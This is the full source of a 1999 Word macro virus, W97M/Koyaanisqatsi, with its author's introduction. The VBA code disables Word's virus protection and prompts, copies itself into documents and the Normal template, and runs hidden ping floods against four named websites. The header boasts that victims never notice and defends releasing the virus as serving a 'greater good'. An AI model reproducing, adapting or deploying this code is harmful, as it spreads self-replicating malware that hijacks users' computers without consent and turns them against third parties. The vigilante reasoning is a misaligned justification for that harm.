*****************************************************************************
           W97M/Koyaanisqatsi (c) Opic [CodeBreakers 1999]

-aka w97m/Ping.A

-Koyaanisqatsi is an old Hopi Indian prophecy, the word translates to:
 World Out Of Balance.

-This is a compact class infector I wrote which upon infection of a new
 machine will begin a DoS "ping" flood on 2 racist sites and 2 kiddy porn 
 sites:

 www.innocentangels.com
 www.whitesonly.net
 www.kkk.com
 www.daddysgirl.com

-The ping floods are run as a background process, so the infected users never 
 knows the "greater good" which they are contributing to.

-I'm told this is the first virus fools HMVS though I havn't tested this 
 myself (it may or may not be true).

Thought I don't condone the spread of viruses, consider that allowing this
one to wild (on the part of the AV/general user community) might serve a good
purpose. Of course it will never happen, yet....sometimes I wonder why.
*****************************************************************************

<-code starts->

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Application.EnableCancelKey = False
SAVIT = ActiveDocument.Saved
Set ACT = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set TIS = ThisDocument.VBProject.VBComponents(1).CodeModule
Set NRM = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ACT.CountOfLines < TIS.CountOfLines Then
ACT.AddFromString TIS.Lines(1, TIS.CountOfLines)
ActiveDocument.Save
ElseIf NRM.CountOfLines < TIS.CountOfLines Then
NRM.AddFromString TIS.Lines(1, TIS.CountOfLines)
End If
Shell " ping -l 5000 -t innocentangels.com", vbHide
Shell " ping -l 5000 -t whitesonly.net", vbHide
Shell " ping -l 5000 -t kkk.com", vbHide
Shell " ping -l 5000 -t daddysgirl.com", vbHide
ActiveDocument.Saved = SAVIT
'W97M/Koyaanisqatsi (c) Opic [CodeBreakers 1999]
'World out of Balance.
End Sub

<-code ends->




